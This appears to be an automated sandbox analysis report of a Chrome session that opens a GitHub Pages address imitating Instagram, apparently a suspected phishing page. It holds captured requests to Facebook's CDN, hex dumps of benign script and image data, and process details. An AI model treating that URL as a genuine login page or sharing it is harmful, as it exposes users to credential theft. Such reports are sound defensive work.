                                                                                                                                                                                                                                2024-09-29 04:55:02 UTC4184INData Raw: 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 1b 00 00 01 07 08 03 00 00 00 a9 e7 12 f3 00 00 03 00 50 4c 54 45 4c 69 71 1e 29 33 2a 31 38 58 5f 66 7e 83 85 d1 d7 d9 9a 9f a1 e0 e5 e7 1a 25 2f 39 40 47 1b 26 30 8e 93 95 e4 e8 eb 63 63 63 86 8b 8d 6e 75 7d ed f2 f5 c0 c0 c0 f3 f6 f5 af b4 b6 43 4a 51 21 2c 36 cf d4 d7 c4 c9 cc 3f 46 4d 37 3e 45 21 28 2e 4c 53 5a 1d 27 32 ab b0 b2 3a 41 48 68 6f 77 33 3a 41 81 86 88 8c 90 93 26 2d 33 95 9a 9c bf c5 c7 2f 37 3d 62 6a 71 b4 b9 bc e3 e5 e8 d7 d9 dc c9 cf d1 46 4d 54 2c 33 39 27 32 3c bc c1 c4 99 9e a0 65 6d 74 ee f3 f6 cc d1 d4 b1 b6 b9 3c 44 4a e5 ea ed ee f1 ed b6 bb be a5 aa ad 48 4f 56 79 7e 80 24 2e 39 9c a1 a3 ec f1 f4 54 5b 63 d8 dd e0 53 5b 62 da df e2 dc e2 e4 5b 63 6a 9f a4 a6 e6 ec ee e7 ed
                                                                                                                                                                                                                                Data Ascii: PNGIHDRPLTELiq)3*18X_f~%/9@G&0cccnu}CJQ!,6?FM7>E!(.LSZ'2:AHhow3:A&-3/7=bjqFMT,39'2<emt<DJHOVy~$.9T[cS[b[cj


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                147192.168.2.450077157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:55:03 UTC592OUTGET /rsrc.php/v3ikpZ4/yJ/l/en_GB/GW1DkJBvUCz.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:55:03 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: sn1DrjXWPdp2RbfiGEtupA==
                                                                                                                                                                                                                                Expires: Sat, 27 Sep 2025 00:40:28 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: pI6M4NHUjB0WSQkqM5wB1SH+h+ZdPmI+BBxmgNn3nTGin3K62KBUvAM7JDi/PP/rUQrHO0sw70vkim8CWttvTQ==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:55:03 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=94, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 31589
                                                                                                                                                                                                                                2024-09-29 04:55:03 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:55:03 UTC15860INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 62 73 74 72 61 63 74 43 6f 6e 74 65 78 74 75 61 6c 44 69 61 6c 6f 67 4b 65 65 70 49 6e 56 69 65 77 70 6f 72 74 42 65 68 61 76 69 6f 72 22 2c 5b 22 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 44 69 6d 65 6e 73 69 6f 6e 73 22 2c 22 45 76 65 6e 74 22 2c 22 56 65 63 74 6f 72 22 2c 22 61 62 73 74 72 61 63 74 4d 65 74 68 6f 64 22 2c 22 74 68 72 6f 74 74 6c 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 74 68 69 73 2e 5f 6c 61 79 65 72 3d 61 2c 74 68 69 73 2e 5f 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 2c 74 68 69 73 2e 5f 73 75 62 73 63 72 69
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("AbstractContextualDialogKeepInViewportBehavior",["ContextualLayerDimensions","Event","Vector","abstractMethod","throttle"],(function(a,b,c,d,e,f){a=function(){"use strict";function a(a){this._layer=a,this._listeners=[],this._subscri
                                                                                                                                                                                                                                2024-09-29 04:55:03 UTC15728INData Raw: 6c 6c 20 73 74 69 6c 6c 20 62 65 20 61 63 63 65 73 73 69 62 6c 65 20 6f 6e 20 74 68 65 20 63 6f 6e 73 74 72 75 63 74 6f 72 2e 27 2c 64 29 3b 66 3d 64 20 69 6e 20 61 3b 69 66 28 66 29 7b 66 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 69 2c 64 29 3f 69 5b 64 5d 3a 6e 75 6c 6c 3b 62 28 22 66 62 6a 73 2f 6c 69 62 2f 69 6e 76 61 72 69 61 6e 74 22 29 28 66 3d 3d 3d 22 44 45 46 49 4e 45 5f 4d 41 4e 59 5f 4d 45 52 47 45 44 22 2c 22 52 65 61 63 74 43 6c 61 73 73 3a 20 59 6f 75 20 61 72 65 20 61 74 74 65 6d 70 74 69 6e 67 20 74 6f 20 64 65 66 69 6e 65 20 60 25 73 60 20 6f 6e 20 79 6f 75 72 20 63 6f 6d 70 6f 6e 65 6e 74 20 6d 6f 72 65 20 74 68 61 6e 20 6f 6e 63 65 2e 20 54 68 69 73 20 63 6f 6e 66
                                                                                                                                                                                                                                Data Ascii: ll still be accessible on the constructor.',d);f=d in a;if(f){f=Object.prototype.hasOwnProperty.call(i,d)?i[d]:null;b("fbjs/lib/invariant")(f==="DEFINE_MANY_MERGED","ReactClass: You are attempting to define `%s` on your component more than once. This conf


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                148192.168.2.450078157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:55:03 UTC592OUTGET /rsrc.php/v3iLl54/yM/l/en_GB/uG4EfEPS4Rt.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:55:03 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: JkXv2E41GUz2oxwfeynwdw==
                                                                                                                                                                                                                                Expires: Sat, 27 Sep 2025 00:40:40 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: Yht31EFsD5g5InP1ygbgd/d41kdvZyCC37Gj0qPlS02q37qLGb3iUV/o9vit7JWXSgKDyFysU8EgEPIqR8QeLQ==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:55:03 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=93, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 13176
                                                                                                                                                                                                                                2024-09-29 04:55:03 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:55:03 UTC13175INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 74 69 64 79 45 76 65 6e 74 22 2c 5b 22 52 75 6e 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 76 61 72 20 68 3d 5b 5d 3b 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 77 68 69 6c 65 28 68 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 61 3d 68 2e 73 68 69 66 74 28 29 3b 61 2e 72 65 6d 6f 76 65 3f 61 2e 72 65 6d 6f 76 65 28 29 3a 61 2e 75 6e 73 75 62 73 63 72 69 62 65 26 26 61 2e 75 6e 73 75 62 73 63 72 69 62 65 28 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 61 29 7b 76 61 72 20 62 2c 63 3d 61 3b 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 69 66 28 21 62 29 72 65 74 75 72 6e 3b 62 2e 61 70 70 6c 79 28 63 2c 61 72 67 75 6d 65 6e 74 73 29 3b 62 3d 6e 75 6c 6c 3b 63 3d 6e 75
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("tidyEvent",["Run"],(function(a,b,c,d,e,f,g){var h=[];function i(){while(h.length){var a=h.shift();a.remove?a.remove():a.unsubscribe&&a.unsubscribe()}}function j(a){var b,c=a;function d(){if(!b)return;b.apply(c,arguments);b=null;c=nu


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                149192.168.2.450079157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:55:03 UTC581OUTGET /rsrc.php/v3/yY/r/pRN8RJz6VlO.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:55:03 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: p8JXmIXG0+SMSFtZDHXHtQ==
                                                                                                                                                                                                                                Expires: Sun, 21 Sep 2025 01:05:36 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: CL2c7L3ot+5FFZUvqO1ZA3jQpdmyVAJPk2e4zKNh5HYZHRqa0VCb6kOgR0vgwdYVXe54KGXmAyqb+jfMxasnQw==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:55:03 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=93, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 29202
                                                                                                                                                                                                                                2024-09-29 04:55:03 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:55:03 UTC15872INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 44 65 66 65 72 72 65 64 43 6f 6d 70 6f 6e 65 6e 74 2e 72 65 61 63 74 22 2c 5b 22 63 72 65 61 74 65 43 61 6e 63 65 6c 61 62 6c 65 46 75 6e 63 74 69 6f 6e 22 2c 22 72 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 76 61 72 20 67 2c 68 3d 67 7c 7c 62 28 22 72 65 61 63 74 22 29 3b 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 62 61 62 65 6c 48 65 6c 70 65 72 73 2e 69 6e 68 65 72 69 74 73 4c 6f 6f 73 65 28 63 2c 61 29 3b 66 75 6e 63 74 69 6f 6e 20 63 28 62 2c 63 29 7b 76 61 72 20 64 3b 64 3d 61 2e 63 61 6c 6c 28 74 68 69 73 2c 62 2c 63 29 7c 7c 74 68 69 73 3b 64 2e 63 61 6e 63 65 6c 61 62 6c 65 4d 6f 64 75 6c 65 73
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("DeferredComponent.react",["createCancelableFunction","react"],(function(a,b,c,d,e,f){var g,h=g||b("react");a=function(a){"use strict";babelHelpers.inheritsLoose(c,a);function c(b,c){var d;d=a.call(this,b,c)||this;d.cancelableModules
                                                                                                                                                                                                                                2024-09-29 04:55:03 UTC13329INData Raw: 76 61 72 20 62 3d 63 28 22 46 6c 75 78 53 74 6f 72 65 4f 6e 44 69 73 70 61 74 63 68 49 6e 73 74 72 75 6d 65 6e 74 61 74 69 6f 6e 22 29 2e 68 61 73 43 61 6c 6c 62 61 63 6b 28 29 3f 28 6a 7c 7c 28 6a 3d 63 28 22 70 65 72 66 6f 72 6d 61 6e 63 65 41 62 73 6f 6c 75 74 65 4e 6f 77 22 29 29 29 28 29 3a 6e 75 6c 6c 3b 74 68 69 73 2e 5f 5f 6f 6e 44 69 73 70 61 74 63 68 28 61 29 3b 69 66 28 62 21 3d 6e 75 6c 6c 29 7b 63 28 22 46 6c 75 78 53 74 6f 72 65 4f 6e 44 69 73 70 61 74 63 68 49 6e 73 74 72 75 6d 65 6e 74 61 74 69 6f 6e 22 29 2e 63 61 6c 6c 28 28 61 3d 74 68 69 73 2e 5f 5f 6d 6f 64 75 6c 65 49 44 29 21 3d 6e 75 6c 6c 3f 61 3a 22 75 6e 6b 6e 6f 77 6e 22 2c 28 6a 7c 7c 28 6a 3d 63 28 22 70 65 72 66 6f 72 6d 61 6e 63 65 41 62 73 6f 6c 75 74 65 4e 6f 77 22 29 29
                                                                                                                                                                                                                                Data Ascii: var b=c("FluxStoreOnDispatchInstrumentation").hasCallback()?(j||(j=c("performanceAbsoluteNow")))():null;this.__onDispatch(a);if(b!=null){c("FluxStoreOnDispatchInstrumentation").call((a=this.__moduleID)!=null?a:"unknown",(j||(j=c("performanceAbsoluteNow"))


                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                Start time:00:53:55
                                                                                                                                                                                                                                Start date:29/09/2024
                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                                Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                Start time:00:53:58
                                                                                                                                                                                                                                Start date:29/09/2024
                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2024,i,16093158522379746750,9946414050435880750,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                Start time:00:54:00
                                                                                                                                                                                                                                Start date:29/09/2024
                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sayidanur.github.io/instagram.com"
                                                                                                                                                                                                                                Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                Start time:00:54:42
                                                                                                                                                                                                                                Start date:29/09/2024
                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5608 --field-trial-handle=2024,i,16093158522379746750,9946414050435880750,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                No disassembly